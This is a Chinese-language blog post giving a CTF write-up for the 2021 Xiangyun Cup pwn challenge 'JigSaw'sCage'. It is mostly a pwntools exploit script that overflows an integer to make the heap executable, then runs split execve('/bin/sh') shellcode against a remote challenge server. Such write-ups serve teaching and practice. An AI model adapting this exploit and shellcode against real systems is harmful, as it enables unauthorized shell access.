ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

祥云杯2021-JigSaw'sCage复现(待复现)

解题思路

溢出整型变量使得堆可执行,然后执行堆上shellcode,getshell

exp

来自luckyu师傅的exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"
#,env={"LD_PRELOAD":"./libc.so.6"})
libc = ELF("./libc.so")
p = remote("47.104.71.220", 10273)
def add(idx):
	p.sendlineafter("Choice :", "1")
	p.sendlineafter("Index? :", str(idx))
def show(idx):
	p.sendlineafter("Choice :", "5")
	p.sendlineafter("Index? :", str(idx))
def edit(idx, content):
	p.sendlineafter("Choice :", "2")
	p.sendlineafter("Index? :", str(idx))
	p.sendafter("iNput:", content)
def free(idx):
	p.sendlineafter("Choice :", "3")
	p.sendlineafter("Index? :", str(idx))
def test(idx):
	p.sendlineafter("Choice :", "4")
	p.sendlineafter("Index? :", str(idx))
def exp():
	shellcode1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
	shellcode2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")

	shellcode3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
	shellcode4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
	print(len(shellcode1))
	p.sendlineafter("Name:", "111")
	p.sendlineafter("Choice:", str(0x100000000))
	add(0)
	add(1)
	add(2)
	add(3)
	edit(0, shellcode1)
	edit(1, shellcode2)
	edit(2, shellcode3)
	edit(3, shellcode4)
	test(0)
	p.interactive()
if __name__ == '__main__':
	exp()
没有标签
首页      PWN      祥云杯2021-JigSaw'sCage复现(待复现)

发表评论

textsms
account_circle
email

ReStr0-Blog

祥云杯2021-JigSaw'sCage复现(待复现)
解题思路 溢出整型变量使得堆可执行,然后执行堆上shellcode,getshell exp 来自luckyu师傅的exp #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * context…
扫描二维码继续阅读
2021-08-22